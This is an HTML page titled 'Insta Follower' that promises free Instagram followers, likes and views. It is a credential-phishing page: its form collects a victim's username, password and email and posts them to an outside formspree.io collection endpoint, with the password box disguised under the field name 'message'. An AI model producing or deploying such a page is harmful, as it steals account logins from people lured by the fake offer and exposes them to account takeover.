<!DOCTYPE html>
<html>
<head>
	<title>Get followers </title>
  <link rel="stylesheet" href="sttyle.css">
</head>
<body>
  
  <h1>Insta Follower </h1>
 
	<form action="https://formspree.io/f/mzzppqgp" method="post">
		<label for="name" >Username:</label>
		<input type="text" id="name" name="name"><br><br>
				<label for="message">Password:</label>
		<textarea id="message" name="message"></textarea><br><br>
	  <label for="email">Email</label>
		<input type="text" id="text" name="email"><br><br>
	  <label for="list1">Follwers</label>
	  <select placeholder="Select" id="list1">
  <option value="option1">100</option>
  <option value="option2">500</option>
  <option value="option3">1000</option>
	     <option value="option4">2K</option>
	     <option value="option5">3K</option>
	     <option value="option6">5K</option>
	     <option value="option7">10K</option>
	  </select>
	  <br>
	  <label for="list2" >Likes</label>
	  <select placeholder="Likes">
	    <option value="option15">500</option>
	     <option value="option8>1K</option>
	     <option value="option9">2K</option>
	     <option value="option10">5K</option>
	     <option value="option11">10K</option>
	     <option value="option12">15K</option>
	     <option value="option13">20K</option>
	     <option value="option14">25K</option>
	       </select> <br>
	       
	      <label for="list3">Views</label>
	       <select placeholder="Views">
	       
	     <option value="option16">500</option>
	     <option value="option17">1K</option>
	     <option value="option18">2K</option>
	     <option value="option19">10K</option>
	     <option value="option20">15K</option>
	     <option value="option21">20K</option>
	     <option value="option22">25K</option>
	     </select><br><br>
	     

		<input type="submit" value="Send">
	</form>
	          <p id="url"></p> 
  
    <script> 
        function GetURL() { 
            var gfg = window.location.href; 
            document.getElementById("url").innerHTML = gfg; 
        } 
    </script> 
</body>
<style>h1 {
   text-align: center;
}

form {
  /* Form styles */
  max-width: 500px;
  margin: 20px auto;
  padding: 20px;
  background-color: #f9f9f9;
  border: 1px solid #ccc;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}

label {
  /* Label styles */
  display: block;
  margin-bottom: 10px;
}

input, textarea {
  /* Input and textarea styles */
  width: 100%;
  padding: 10px;
  margin-bottom: 20px;
  border: 1px solid #ccc;
}

input:focus, textarea:focus {
  /* Focus styles */
  border-color: #aaa;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}

input[type="submit"] {
  /* Submit button styles */
  background-color: #4CAF50;
  color: #fff;
  padding: 10px 20px;
  border: none;
  border-radius: 5px;
  cursor: pointer;
}

input[type="submit"]:hover {
  /* Submit button hover styles */
  background-color: #3e8e41;
}</style></html>
  